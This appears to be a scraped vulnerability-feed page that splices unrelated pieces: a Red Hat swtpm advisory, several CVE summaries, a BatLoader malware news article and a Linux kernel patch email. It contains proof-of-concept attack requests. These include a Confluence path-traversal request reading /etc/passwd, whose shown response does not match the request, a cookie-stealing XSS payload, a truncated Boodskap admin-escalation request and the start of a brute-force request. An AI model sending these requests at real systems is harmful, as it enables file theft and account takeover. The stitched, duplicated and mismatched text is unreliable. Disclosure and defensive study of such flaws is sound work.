Red Hat Security Advisory 2022-8100-01 - SWTPM is a TPM emulator built on libtpms providing TPM functionality for QEMU VMs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Low: swtpm security and bug fix update  
Advisory ID:       RHSA-2022:8100-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8100  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-23645  
====================================================================  
1. Summary:

An update for swtpm is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, s390x, x86_64

3. Description:

SWTPM is a TPM emulator built on libtpms providing TPM functionality for  
QEMU VMs.

Security Fix(es):

* swtpm: Unchecked header size indicator against expected size  
(CVE-2022-23645)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2056491 - CVE-2022-23645 swtpm: Unchecked header size indicator against expected size  
2090219 - Not able to install windows 11 OS with vTPM in spec (disable FIPS)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.src.rpm

aarch64:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

s390x:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

x86_64:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23645  
https://access.redhat.com/security/updates/classification/#low  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMXtzjgjWX9erEAQgHDA/+OMR2sFGbdP6hED6vJ/mp7wcx8xDO2fcl  
lUsbNs1WXDZ8N0ZFoQNN/iqXOE4f3YtliWHcFQOcacIyTAyev8469r4lTRHK5+RV  
KcQOOvdvVeibxvjR1bQS5hMZET+FWxfcQawVkTZjse6Osef6I3GF7VD5QoSbDI2B  
Lgj9SdvshnG2goTyLpwE9ZFUIyUhWy1CVDEGOFoeLk1zkJFMerkWb/FeQa2yCOxZ  
hPx1d3NIOH6V+bYYRl1owf9SpS/DhQJ7sCsay3zwz8uzjqzSX3x2cnj1U1LgCQ66  
RkP3T1CHY9uRd3T7WT0oAGj4uodtXjf8+64ZgNBKqtv/2Ls7aZciIvRb1xwNVGc2  
fOTSdv3zRPBwoIlxRiCxuqr5kDj3+9b9rGu1xqkedEt+736XaBcQ6uD6gHjFS41R  
2KWxQ/Db0DetUyZc99atVs9YcP5YPqI+XbQWNJaGPmLR3JaZ8JAQTNEQWAKMXQD/  
EPnoPYY8sgmZGDnzZb04IcnYIfvzj3DLWm0JB3cORwawvL1SulFhoikEuJ9DEKPG  
uIhE1nwHfGUlMmIMAbk0dPzoDt80gZMr4nHlWfEUOwCUQrQw6O67Nr9JNd32bwAW  
T77tKs+HriSXYQ9isoaGFnlVsVH965tEte1pHna3YqNznR3GC6Hh072gfJXWf/qx  
XpYcV7g6aB0=l7Di  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8100-01

The "Follow Me Plugin" plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1.1. This is due to missing nonce validation on the FollowMeIgniteSocialMedia_options_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2022-3240: follow-me.php in follow-me/trunk – WordPress Plugin Repository

An update for swtpm is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-23645: swtpm: Unchecked header size indicator against expected size


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-11-15

Updated:

2022-11-15

**RHSA-2022:8100 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Low: swtpm security and bug fix update

**Type/Severity**

Security Advisory: Low

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for swtpm is now available for Red Hat Enterprise Linux 9.  

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

SWTPM is a TPM emulator built on libtpms providing TPM functionality for QEMU VMs.  

Security Fix(es):  

*   swtpm: Unchecked header size indicator against expected size (CVE-2022-23645)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

Additional Changes:  

For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.1 Release Notes linked from the References section.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 9 s390x
*   Red Hat Enterprise Linux for ARM 64 9 aarch64

**Fixes**

*   BZ - 2056491 - CVE-2022-23645 swtpm: Unchecked header size indicator against expected size
*   BZ - 2090219 - Not able to install windows 11 OS with vTPM in spec (disable FIPS)

**References**

*   https://access.redhat.com/security/updates/classification/#low
*   https://access.redhat.com/documentation/en-us/red\_hat\_enterprise\_linux/9/html/9.1\_release\_notes/index

**Red Hat Enterprise Linux for x86\_64 9**

SRPM

swtpm-0.7.0-3.20211109gitb79fd91.el9.src.rpm

SHA-256: 3835acbca4c706f03595d66888d99456d717e95467869d1b43b15387fc0593e7

x86\_64

swtpm-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: 870921119cec76317ac17683dc20a8be1c1e87142b4a890003e44ae87930eefa

swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: ad29429db7b779c6bb90023b245b95df26dd7556fd77d0b0049cb74f493d530d

swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: 6d3bd9ceb16ae1d946a7873a5ea4f54340c28602111a08d815f168b0fefebe1c

swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: 930701a0e1032f8fbf8a8752ef7e07c61cb79eb47448a974990c28213c7b3a60

swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: 92433c17e4ce84380fc62d58b931544aa36d3c3e3977e0654e67cc40db0dec90

swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: 743e1bcdbf00afd5deb18394f340de7ca8d75672bfdfde015e6a33c352e674eb

swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86\_64.rpm

SHA-256: 647570da6db7832d1e70bd52106d8d8e7ab015e47c325663caad38d8214787a3

**Red Hat Enterprise Linux for IBM z Systems 9**

SRPM

swtpm-0.7.0-3.20211109gitb79fd91.el9.src.rpm

SHA-256: 3835acbca4c706f03595d66888d99456d717e95467869d1b43b15387fc0593e7

s390x

swtpm-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: 799fd05cd90b94e3bd26049165a56ac8a7531c5c318e17949766d8b894fb6a10

swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: 24c81d2170bbd27b6cc1fd23f03a23f998d69994a369006a4437a74dee1f960c

swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: f8d933a4fc683e5d153a710879516c05572efa6da4f33589063f89d76c4d2454

swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: a39bd8dc658be57d9b45825726075cf8106233d123812a6dce1f26bd3d44c6f2

swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: fccb917cd9bbcc361e7e1fefce8dc11b7d9a7668e02b066658c38d35f5bc192f

swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: 035c0647f30e1c65aac29cdbf6a71b96d88146b6fdfbdd993fae09fe732a28fe

swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

SHA-256: 2735d3d208a8ccaea5f1f77d85a43a2ed7378a40f65f750f473050206f007027

**Red Hat Enterprise Linux for ARM 64 9**

SRPM

swtpm-0.7.0-3.20211109gitb79fd91.el9.src.rpm

SHA-256: 3835acbca4c706f03595d66888d99456d717e95467869d1b43b15387fc0593e7

aarch64

swtpm-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: 90776cb1ca63e1843c6ee8ea6115597cd586053a041ff34b9ae2247e5b9b4fec

swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: 5f8e843a6aec512262be76423779557e1cd16a171bcc674c02057347c539411d

swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: b963d78fc894a115982a394e58f450c02c20ff675e462d4e17f70b7bb951f591

swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: 2c5c66feb22c3f001100856351c2fa36ace44ef6cf5b754fb84fd64505b8ceb9

swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: 387127c77cf0086b69178fa71f6e70338128fd2c9c5187b2650dfb69e7655a70

swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: c6068a196dcd278d37a34a4356738d9e110b1bfb1a8240a88cdd32fd7e91ae93

swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

SHA-256: 3b06a0f9a990b3eb7435f20d95f09746cd6db807825cf960f40ef84bfcaa9aef

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:8100: Red Hat Security Advisory: swtpm security and bug fix update

In the Netic User Export add-on before 1.3.5 for Atlassian Confluence, authorization is mishandled. An unauthenticated attacker could access files on the remote system.

Vulnerability Type: Unauthenticated Arbitrary File Read

Vendor of Product: Atlassian Confluence

Affected Product Code Base: User Export for Confluence

Product Version: < 1.3.5

Description: The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and download any file from the system.

Attack Type: Remote

Endpoint: /plugins/servlet/confluenceuserexport/admin/download

Assigned CVE-ID: CVE-2022-42977, CVE-2022-42978

Steps To Reproduce

1\. Issue a HTTP POST/GET request to the following endpoint: https://<confluence.example.com>/plugins/servlet/confluenceuserexport/admin/download?fileName=\[file-path\]

#PoC

\[REQUEST\]

GET /plugins/servlet/confluenceuserexport/admin/download?fileName=../../../../../../etc/passwd HTTP/1.1

Host: confluence.example.local

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

\[RESPONSE\]

HTTP/1.1 401

Set-Cookie: JSESSIONID=ABCDEFGHIJKLMNOPQRSTUVWYZ; Path=/; HttpOnly

WWW-Authenticate: OAuth realm="confluence.example.local"

Content-Disposition: attachment; filename=../../../../../etc/os-release

Content-Type: text/html;charset=UTF-8

Content-Length: 407

Not AuthorizedNAME="CentOS Linux"

VERSION="7 (Core)"

ID="centos"

CVE-2022-42978: Unauthenticated Arbitrary File Read

Konker v2.3.9 was to discovered to contain a Cross-Site Request Forgery (CSRF).

**CVE-ID: CVE-2022-35613**

**Popular posts from this blog**

**CVE-ID: CVE-2022-35137**

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output encode JS payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies. References: https://owasp.org/www-community/attacks/xss/

**CVE-ID: CVE-2022-35135, CVE-2022-35136**

CVE-2022-35136:  Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. CVE-2022-35135:  Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges  via a crafted request sent to /api/user/upsert/<uuid>.  The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to  http://192.168.72.157/api/user/upsert/<userid>  endpoint. HTTP Request: POST /api/user/upsert/8c34fa03- 706a-4dc7-b484-cd8e0c329c81 HTTP/1.1 Host: 192.168.72.157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Re

**CVE-ID: CVE-2022-31861**

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs. Patch details:  https://github.com/thingsboard/thingsboard/pull/7385 Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform. According to Thingsboard's documentation ( https://thingsboard.io/docs/pe/user-guide/rbac/ ), on the community edition, "a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant". Each tenant has several customers and as

CVE-2022-35613: CVE-ID: CVE-2022-35613

BatLoader has spread rapidly to roost in systems globally, tailoring payloads to its victims.

A dangerous new malware loader with features for determining whether it's on a business system or a personal computer has begun rapidly infecting systems worldwide over the past few months.

Researchers at VMware Carbon Black are tracking the threat, dubbed BatLoader, and say its operators are using the dropper to distribute a variety of malware tools including a banking Trojan, an information stealer, and the Cobalt Strike post-exploit toolkit on victim systems. The threat actor's tactic has been to host the malware on compromised websites and lure users to those sites using search engine optimization (SEO) poisoning methods.

**Living Off the Land**

BatLoader relies heavily on batch and PowerShell scripts to gain an initial foothold on a victim machine and to download other malware onto it. This has made the campaign hard to detect and block, especially in the early stages, analysts from VMware Carbon Black's managed detection and response (MDR) team said in a report released on Nov. 14.

VMware said its Carbon Black MDR team had observed 43 successful infections in the last 90 days, in addition to numerous other unsuccessful attempts where a victim downloaded the initial infection file but did not execute it. Nine of the victims were organizations in the business services sector, seven were financial services companies, and five were in manufacturing. Other victims included organizations in the education, retail, IT, and healthcare sectors.

On Nov. 9, eSentire said its threat-hunting team had observed BatLoader's operator luring victims to websites masquerading as download pages for popular business software such as LogMeIn, Zoom, TeamViewer, and AnyDesk. The threat actor distributed links to these websites via ads that showed up prominently in search engine results when users searched for any of these software products.

The security vendor said that in one late October incident, an eSentire customer arrived at a fake LogMeIn download page and downloaded a Windows installer that, among other things, profiles the system and uses the information to retrieve a second-stage payload.

"What makes BatLoader interesting is that it has logic built into it that determines if the victim computer is a personal computer or a corporate computer," says Keegan Keplinger, research and reporting lead with eSentire’s TRU research team. "It then drops the type of malware appropriate for the situation."

**Selective Payload Delivery**

For example, if BatLoader hits a personal computer, it downloads Ursnif banking malware and the Vidar information stealer. If it hits a domain-joined or corporate computer, it downloads Cobalt Strike and the Syncro remote monitoring and management tool, in addition to the banking Trojan and information stealer.

"If BatLoader lands on a personal computer, it will proceed with fraud, infostealing, and banking-based payloads like Ursnif," Keegan says. "If BatLoader detects that it's in an organizational environment, it will proceed with intrusion tools like Cobalt Strike and Syncro."

Keegan says eSentire has observed "a lot" of recent cyberattacks involving BatLoader. Most of the attacks are opportunistic and hit anyone looking for trusted and popular free software tools. 

"To get in front of organizations, BatLoader leverages poisoned ads so that when employees look for trusted free software, like LogMeIn and Zoom, they instead land on sites controlled by attackers, delivering BatLoader."

**Overlaps With Conti, ZLoader**

VMware Carbon Black said that while there are several aspects of the BatLoader campaign that are unique, there are also several attributes of the attack chain that have a resemblance with the Conti ransomware operation. 

The overlaps include an IP address that the Conti group used in a campaign leveraging the Log4j vulnerability, and the use of a remote management tool called Atera that Conti has used in previous operations. 

In addition to the similarities with Conti, BatLoader also has several overlaps with Zloader, a banking Trojan that appears derived from the Zeus banking Trojan of the early 2000s, the security vendor said. The biggest similarities there include the use of SEO poisoning to lure victims to malware-laden websites, the use of Windows Installer for establishing an initial foothold and the use of PowerShell, batch scripts, and other native OS binaries during the attack chain.

Mandiant was the first to report on BatLoader. In a blog post in February, the security vendor reported observing a threat actor using "free productivity apps installation" and "free software development tools installation" themes as SEO keywords to lure users to download sites. 

"This initial BatLoader compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization," Mandiant said. The attackers used every stage to set up the next phase of the attack chain using tools such as PowerShell, Msiexec.exe, and Mshta.exe to evade detection.

Researchers Sound Alarm on Dangerous BatLoader Malware Dropper

An incorrect read request flaw was found in the Infrared Transceiver USB driver in the Linux kernel. This issue occurs when a user attaches a malicious USB device. A local user could use this flaw to starve the resources, causing denial of service or potentially crashing the system.

From: Mauro Carvalho Chehab <mchehab@kernel.org>
To: linuxtv-commits@linuxtv.org
Cc: Rondreis <linhaoguo86@gmail.com>,
	Alan Stern <stern@rowland.harvard.edu>,
	Sean Young <sean@mess.org>,
	stable@vger.kernel.org
Subject: \[git:media\_stage/master\] media: mceusb: Use new usb\_control\_msg\_\*() routines
Date: Sat, 24 Sep 2022 05:49:45 +0000	\[thread overview\]
Message-ID: <E1obysd-009Grw-He@www.linuxtv.org> (raw)

This is an automatic generated email to let you know that the following patch were queued:

Subject: media: mceusb: Use new usb\_control\_msg\_\*() routines
Author:  Alan Stern <stern@rowland.harvard.edu>
Date:    Fri Aug 26 21:31:40 2022 +0200

Automatic kernel fuzzing led to a WARN about invalid pipe direction in
the mceusb driver:

------------\[ cut here \]------------
usb 6-1: BOGUS control dir, pipe 80000380 doesn't match bRequestType 40
WARNING: CPU: 0 PID: 2465 at drivers/usb/core/urb.c:410
usb\_submit\_urb+0x1326/0x1820 drivers/usb/core/urb.c:410
Modules linked in:
CPU: 0 PID: 2465 Comm: kworker/0:2 Not tainted 5.19.0-rc4-00208-g69cb6c6556ad #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Workqueue: usb\_hub\_wq hub\_event
RIP: 0010:usb\_submit\_urb+0x1326/0x1820 drivers/usb/core/urb.c:410
Code: 7c 24 40 e8 ac 23 91 fd 48 8b 7c 24 40 e8 b2 70 1b ff 45 89 e8
44 89 f1 4c 89 e2 48 89 c6 48 c7 c7 a0 30 a9 86 e8 48 07 11 02 <0f> 0b
e9 1c f0 ff ff e8 7e 23 91 fd 0f b6 1d 63 22 83 05 31 ff 41
RSP: 0018:ffffc900032becf0 EFLAGS: 00010282
RAX: 0000000000000000 RBX: ffff8881100f3058 RCX: 0000000000000000
RDX: ffffc90004961000 RSI: ffff888114c6d580 RDI: fffff52000657d90
RBP: ffff888105ad90f0 R08: ffffffff812c3638 R09: 0000000000000000
R10: 0000000000000005 R11: ffffed1023504ef1 R12: ffff888105ad9000
R13: 0000000000000040 R14: 0000000080000380 R15: ffff88810ba96500
FS: 0000000000000000(0000) GS:ffff88811a800000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007ffe810bda58 CR3: 000000010b720000 CR4: 0000000000350ef0
Call Trace:
<TASK>
usb\_start\_wait\_urb+0x101/0x4c0 drivers/usb/core/message.c:58
usb\_internal\_control\_msg drivers/usb/core/message.c:102 \[inline\]
usb\_control\_msg+0x31c/0x4a0 drivers/usb/core/message.c:153
mceusb\_gen1\_init drivers/media/rc/mceusb.c:1431 \[inline\]
mceusb\_dev\_probe+0x258e/0x33f0 drivers/media/rc/mceusb.c:1807

The reason for the warning is clear enough; the driver sends an
unusual read request on endpoint 0 but does not set the USB\_DIR\_IN bit
in the bRequestType field.

More importantly, the whole situation can be avoided and the driver
simplified by converting it over to the relatively new
usb\_control\_msg\_recv() and usb\_control\_msg\_send() routines.  That's
what this fix does.

Reported-and-tested-by: Rondreis <linhaoguo86@gmail.com>
Link: https://lore.kernel.org/all/CAB7eexLLApHJwZfMQ=X-PtRhw0BgO+5KcSMS05FNUYejJXqtSA@mail.gmail.com/

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Cc: stable@vger.kernel.org
Signed-off-by: Sean Young <sean@mess.org>
Signed-off-by: Mauro Carvalho Chehab <mchehab@kernel.org>

 drivers/media/rc/mceusb.c | 35 ++++++++++++++---------------------
 1 file changed, 14 insertions(+), 21 deletions(-)

---

diff --git a/drivers/media/rc/mceusb.c b/drivers/media/rc/mceusb.c
index 0834d5f866fd..39d2b03e2631 100644
--- a/drivers/media/rc/mceusb.c
+++ b/drivers/media/rc/mceusb.c
@@ -1416,42 +1416,37 @@ static void mceusb\_gen1\_init(struct mceusb\_dev \*ir)
 {
 	int ret;
 	struct device \*dev = ir->dev;
\-	char \*data;
-
-	data = kzalloc(USB\_CTRL\_MSG\_SZ, GFP\_KERNEL);
-	if (!data) {
-		dev\_err(dev, "%s: memory allocation failed!", \_\_func\_\_);
-		return;
-	}
+	char data\[USB\_CTRL\_MSG\_SZ\];
 
 	/\*
 	 \* This is a strange one. Windows issues a set address to the device
 	 \* on the receive control pipe and expect a certain value pair back
 	 \*/
\-	ret = usb\_control\_msg(ir->usbdev, usb\_rcvctrlpipe(ir->usbdev, 0),
-			      USB\_REQ\_SET\_ADDRESS, USB\_TYPE\_VENDOR, 0, 0,
-			      data, USB\_CTRL\_MSG\_SZ, 3000);
+	ret = usb\_control\_msg\_recv(ir->usbdev, 0, USB\_REQ\_SET\_ADDRESS,
+				   USB\_DIR\_IN | USB\_TYPE\_VENDOR,
+				   0, 0, data, USB\_CTRL\_MSG\_SZ, 3000,
+				   GFP\_KERNEL);
 	dev\_dbg(dev, "set address - ret = %d", ret);
 	dev\_dbg(dev, "set address - data\[0\] = %d, data\[1\] = %d",
 						data\[0\], data\[1\]);
 
 	/\* set feature: bit rate 38400 bps \*/
\-	ret = usb\_control\_msg(ir->usbdev, usb\_sndctrlpipe(ir->usbdev, 0),
-			      USB\_REQ\_SET\_FEATURE, USB\_TYPE\_VENDOR,
-			      0xc04e, 0x0000, NULL, 0, 3000);
+	ret = usb\_control\_msg\_send(ir->usbdev, 0,
+				   USB\_REQ\_SET\_FEATURE, USB\_TYPE\_VENDOR,
+				   0xc04e, 0x0000, NULL, 0, 3000, GFP\_KERNEL);
 
 	dev\_dbg(dev, "set feature - ret = %d", ret);
 
 	/\* bRequest 4: set char length to 8 bits \*/
\-	ret = usb\_control\_msg(ir->usbdev, usb\_sndctrlpipe(ir->usbdev, 0),
-			      4, USB\_TYPE\_VENDOR,
-			      0x0808, 0x0000, NULL, 0, 3000);
+	ret = usb\_control\_msg\_send(ir->usbdev, 0,
+				   4, USB\_TYPE\_VENDOR,
+				   0x0808, 0x0000, NULL, 0, 3000, GFP\_KERNEL);
 	dev\_dbg(dev, "set char length - retB = %d", ret);
 
 	/\* bRequest 2: set handshaking to use DTR/DSR \*/
\-	ret = usb\_control\_msg(ir->usbdev, usb\_sndctrlpipe(ir->usbdev, 0),
-			      2, USB\_TYPE\_VENDOR,
-			      0x0000, 0x0100, NULL, 0, 3000);
+	ret = usb\_control\_msg\_send(ir->usbdev, 0,
+				   2, USB\_TYPE\_VENDOR,
+				   0x0000, 0x0100, NULL, 0, 3000, GFP\_KERNEL);
 	dev\_dbg(dev, "set handshake  - retC = %d", ret);
 
 	/\* device resume \*/
@@ -1459,8 +1454,6 @@ static void mceusb\_gen1\_init(struct mceusb\_dev \*ir)
 
 	/\* get hw/sw revision? \*/
 	mce\_command\_out(ir, GET\_REVISION, sizeof(GET\_REVISION));
\-
-	kfree(data);
 }
 
 static void mceusb\_gen2\_init(struct mceusb\_dev \*ir)

                 reply	other threads:\[~2022-09-24  6:43 UTC|newest\]

**Thread overview:** \[no followups\] expand\[flat|nested\]  mbox.gz  Atom feed

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=E1obysd-009Grw-He@www.linuxtv.org \\
    --to=mchehab@kernel.org \\
    --cc=linhaoguo86@gmail.com \\
    --cc=linux-media@vger.kernel.org \\
    --cc=linuxtv-commits@linuxtv.org \\
    --cc=sean@mess.org \\
    --cc=stable@vger.kernel.org \\
    --cc=stern@rowland.harvard.edu \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-3903: [git:media_stage/master] media: mceusb: Use new usb_control_msg_*() routines

Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.

The migrate-email endpoint is requiring Email, Username, and Password parameter. This endpoint contain authentication functionality that doesn't have any protection from brute-force attack, which allows an attacker to try every possible password combination without any restriction.

**CWE-307: Improper Restriction of Excessive Authentication Attempts****POC****1\. Send this request to Burpsuite Intruder**

    POST /api/account/migrate-email HTTP/1.1
    Host: 192.168.189.132:5000
    Accept: application/json, text/plain, */*
